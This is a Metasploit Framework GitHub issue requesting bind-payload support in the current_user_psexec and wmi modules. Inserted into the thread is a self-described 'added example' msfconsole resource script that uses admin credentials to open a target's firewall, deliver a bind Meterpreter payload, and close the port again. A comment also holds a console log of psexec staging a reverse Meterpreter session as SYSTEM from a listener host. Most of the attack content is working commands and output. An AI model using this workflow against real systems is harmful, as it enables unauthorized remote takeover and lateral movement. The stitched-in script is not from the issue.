metasploit-framework
Ability to use bind payloads with wmi and current_user_psexec
This issue was RM8694, originally filed by @rsmudge
I love windows/local/current_user_psexec and windows/local/wmi. I noticed though that I can't use bind payloads with these modules.
Sometimes, I'll capture an admin token or creds and need to take control of a system that can't stage to the internet. I usually use psexec_command to drop the firewall and then deliver a bind payload. It'd be nice if these modules supported this workflow.
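The workaround described above, written out as an msfconsole resource script: open the bind port on the target with auxiliary/admin/smb/psexec_command, then deliver a bind payload through the remote exploit/windows/smb/psexec module (which, unlike the local current_user_psexec and wmi modules, accepts bind payloads), and close the port again once the session is up. This is an added example, not code from the issue or from Metasploit itself; the host, domain, credentials, port and firewall-rule name are placeholders.

```msf
# Constructed example; host, credentials, port and rule name are placeholders.
# Save as bind_psexec.rc and run with: msfconsole -q -r bind_psexec.rc

# Credentials and target shared by every module below
setg RHOSTS    192.168.153.147
setg SMBDomain DAFOREST
setg SMBUser   Administrator
setg SMBPass   theAdmin123

# Step 1: allow inbound TCP/9933 on the target (runs as SYSTEM via the psexec service)
use auxiliary/admin/smb/psexec_command
set COMMAND netsh advfirewall firewall add rule name=msf-bind-9933 dir=in action=allow protocol=TCP localport=9933
run

# Step 2: deliver a bind payload; LPORT is the port the payload listens on at the target,
# so it must match the firewall rule above. run -z keeps the session backgrounded so the
# script continues. run blocks until the bind handler has connected or given up.
use exploit/windows/smb/psexec
set PAYLOAD windows/x64/meterpreter/bind_tcp
set LPORT 9933
run -z

# Step 3: the TCP connection is already established, so the rule can go again
use auxiliary/admin/smb/psexec_command
set COMMAND netsh advfirewall firewall delete rule name=msf-bind-9933
run

sessions -l
```

The rule name is deliberately unquoted because msfconsole strips shell quoting from `set` arguments before storing the value; netsh accepts an unquoted name as long as it contains no spaces. Each psexec_command run creates and removes a temporary service on the target, so this approach is noisier than a single psexec with a reverse payload and is only worth it for hosts that cannot reach a listener of yours.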
Seems to still be an issue, nearly 10 years later:
```
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.153.132  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               test123          no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               test             no        The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.153.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set USERNAME Administrator
USERNAME => Administrator
msf6 exploit(windows/smb/psexec) > set PASSWORD theAdmin123
PASSWORD => theAdmin123
msf6 exploit(windows/smb/psexec) > set DOMAIN DAFOREST
DOMAIN => DAFOREST
msf6 exploit(windows/smb/psexec) > set RHOST 192.168.153.147
RHOST => 192.168.153.147
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.153.128:4444
[*] 192.168.153.147:445 - Connecting to the server...
[*] 192.168.153.147:445 - Authenticating to 192.168.153.147:445|DAFOREST as user 'Administrator'...
[*] 192.168.153.147:445 - Selecting PowerShell target
[*] 192.168.153.147:445 - Executing the payload...
[+] 192.168.153.147:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.153.147
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.147:61411) at 2023-02-01 10:03:10 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > use exploit/windows/local/current_user_psexec
[*] Using configured payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/local/current_user_psexec) > show options

Module options (exploit/windows/local/current_user_psexec):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DISPNAME                           no        Service display name (Default: random)
   INTERNAL_ADDRESS                   no        Session's internal address or hostname for the victims to grab the payload from (Default: detected)
   KERBEROS          false            yes       Authenticate via Kerberos, don't resolve hostnames
   NAME                               no        Service name on each target in RHOSTS (Default: random)
   RHOSTS                             no        Target address range or CIDR identifier
   SESSION                            yes       The session to run this module on
   TECHNIQUE         PSH              yes       Technique to use (Accepted: PSH, SMB)


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Universal


View the full module info with the info, or info -d command.

msf6 exploit(windows/local/current_user_psexec) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/current_user_psexec) > set RHOST 192.168.153.147
RHOST => 192.168.153.147
msf6 exploit(windows/local/current_user_psexec) > set LPORT 9933
LPORT => 9933
msf6 exploit(windows/local/current_user_psexec) > run

[*] Started bind TCP handler against 192.168.153.147:9933
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/current_user_psexec) > exploit

[*] Started bind TCP handler against 192.168.153.147:9933
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/current_user_psexec) > show options

Module options (exploit/windows/local/current_user_psexec):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DISPNAME                           no        Service display name (Default: random)
   INTERNAL_ADDRESS                   no        Session's internal address or hostname for the victims to grab the payload from (Default: detected)
   KERBEROS          false            yes       Authenticate via Kerberos, don't resolve hostnames
   NAME                               no        Service name on each target in RHOSTS (Default: random)
   RHOSTS                             no        Target address range or CIDR identifier
   SESSION           1                yes       The session to run this module on
   TECHNIQUE         PSH              yes       Technique to use (Accepted: PSH, SMB)


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     9933             yes       The listen port
   RHOST     192.168.153.147  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Universal


View the full module info with the info, or info -d command.

msf6 exploit(windows/local/current_user_psexec) >
```
Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.
We've labeled this as attic and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.